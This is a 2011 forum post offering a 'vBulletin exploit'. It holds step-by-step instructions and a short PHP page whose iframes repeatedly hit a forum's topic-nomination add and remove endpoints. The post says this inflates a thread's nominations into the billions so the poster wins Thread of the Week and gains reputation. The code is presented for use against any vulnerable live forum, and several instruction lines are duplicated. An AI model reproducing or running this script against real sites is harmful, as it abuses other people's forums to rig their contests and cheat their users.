VBulletin Exploit. 06-01-2011, 10:37 PM
#1
All the credits goes to RodneyTrotter for the exploit.
What does it do:
- This glitches the site and nominates a thread 4billlion times, therefore you're guaranteed to win the TOTW and earn whatever rep they give a way.
- This glitches the site and nominates a thread 4billlion times, therefore you're guaranteed to win the TOTW and earn whatever rep they give a way.
A Thread about it :
Code:
http://www.nextgenupdate.com/forums/reso...-week.html
And here's a screenshot:
![[Image: PROjce.png]](http://screensnapr.com/-/uploads/PROjce.png)
How to:
- Download xampp because we're using a PHP script.
- Install xampp and add the file bellow into htdocs
- Create a file called index.php and add the code bellow:
- Download xampp because we're using a PHP script.
- Install xampp and add the file bellow into htdocs
- Create a file called index.php and add the code bellow:
Code:
<?php
$siteurl = "http://vb.site";
$threadid = "657";
?>
<html>
<title>VB Exploit found by RodneyTrotter</title>
<!---- http://tiptopgamers.com ---->
<iframe src="<?php echo $siteurl; ?>/nominate_topic.php?do=nominate_topic_add_user&p=<?php echo $threadid; ?>"></iframe>
<iframe src="<?php echo $siteurl; ?>/nominate_topic.php?do=nominate_topic_remove_user&p=<?php echo $threadid; ?>"></iframe>
</html>
- Just edit the site url to whatever site allows it, and change the thread id to the id of the thread.
- Now that's done, just keep refreshing http://localhost/index.php 'till it works.
- Now that's done, just keep refreshing http://localhost/index.php 'till it works.
The author of the Exploit wants you to leave a Copyright wherever you Post this, as I have already done in the Credits. -Coded32
Thanks.
![[Image: 9Kcm1.png]](http://i.imgur.com/9Kcm1.png)
To the Mind that is still, The Whole World Surrenders.
Exploiter on Team OpenFire
C,C++,Java and Perl source Developer.